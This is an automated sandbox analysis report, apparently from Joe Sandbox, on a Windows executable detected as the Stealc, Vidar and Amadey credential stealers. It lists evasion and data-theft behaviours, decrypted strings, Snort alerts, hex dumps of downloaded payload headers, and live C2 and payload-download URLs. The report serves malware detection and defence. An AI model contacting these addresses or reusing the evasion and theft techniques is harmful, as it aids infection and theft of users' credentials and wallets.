Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1467852
MD5: de1d8c161d81ba79c888fef77c75db93
SHA1: 55e3b5e658d41d98779214afb48d34c66bf17346
SHA256: 31cbdcdb540d6bc6fbc616c288f6f7ad7c74fe74eff55a135dafc31853b76126
Tags: exe

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Vidar Vidar is a fork of the Arkei stealer. It appears to be one of the first stealers that collects information from 2FA software and the Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: http://77.91.77.81/stealc/random.exe- Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/QLIa Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/ Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exepData Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeT Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/well/random.exeL Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/well/random.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/well/random.exen Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe506 Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 14.2.0244247334.exe.720000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
Source: explorti.exe.4724.13.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Source: file.exe.3472.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.30/920475a59bac849d.php"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe ReversingLabs: Detection: 42%
Source: file.exe ReversingLabs: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetProcAddress
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: LoadLibraryA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrcatA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: OpenEventA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateEventA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CloseHandle
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Sleep
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetUserDefaultLangID
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualAllocExNuma
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetSystemInfo
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: HeapAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetComputerNameA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrcpyA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetProcessHeap
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetCurrentProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrlenA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ExitProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetSystemTime
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SystemTimeToFileTime
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: advapi32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: gdi32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: user32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: crypt32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ntdll.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetUserNameA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateDCA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetDeviceCaps
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ReleaseDC
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CryptStringToBinaryA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: sscanf
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VMwareVMware
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: HAL9TH
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: JohnDoe
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: DISPLAY
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: %hu/%hu/%hu
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: http://85.28.47.30
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: /920475a59bac849d.php
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: /69934896f997d5bb/
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Nice
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetFileAttributesA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalLock
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: HeapFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetFileSize
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalSize
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: IsWow64Process
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Process32Next
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLocalTime
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FreeLibrary
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetTimeZoneInformation
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetSystemPowerStatus
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetVolumeInformationA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Process32First
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLocaleInfoA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetModuleFileNameA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: DeleteFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FindNextFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: LocalFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FindClose
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: LocalAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetFileSizeEx
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ReadFile
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SetFilePointer
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: WriteFile
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FindFirstFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CopyFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualProtect
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLastError
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrcpynA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: MultiByteToWideChar
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: WideCharToMultiByte
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: OpenProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: TerminateProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetCurrentProcessId
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: gdiplus.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ole32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: bcrypt.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: wininet.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: shlwapi.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: shell32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: psapi.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: rstrtmgr.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SelectObject
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: BitBlt
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C566C80
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49743 version: TLS 1.0
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.30:80 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.30:80 -> 192.168.2.5:49704
Source: Malware configuration extractor URLs: 85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 20:20:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 20:20:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 20:20:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 20:20:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
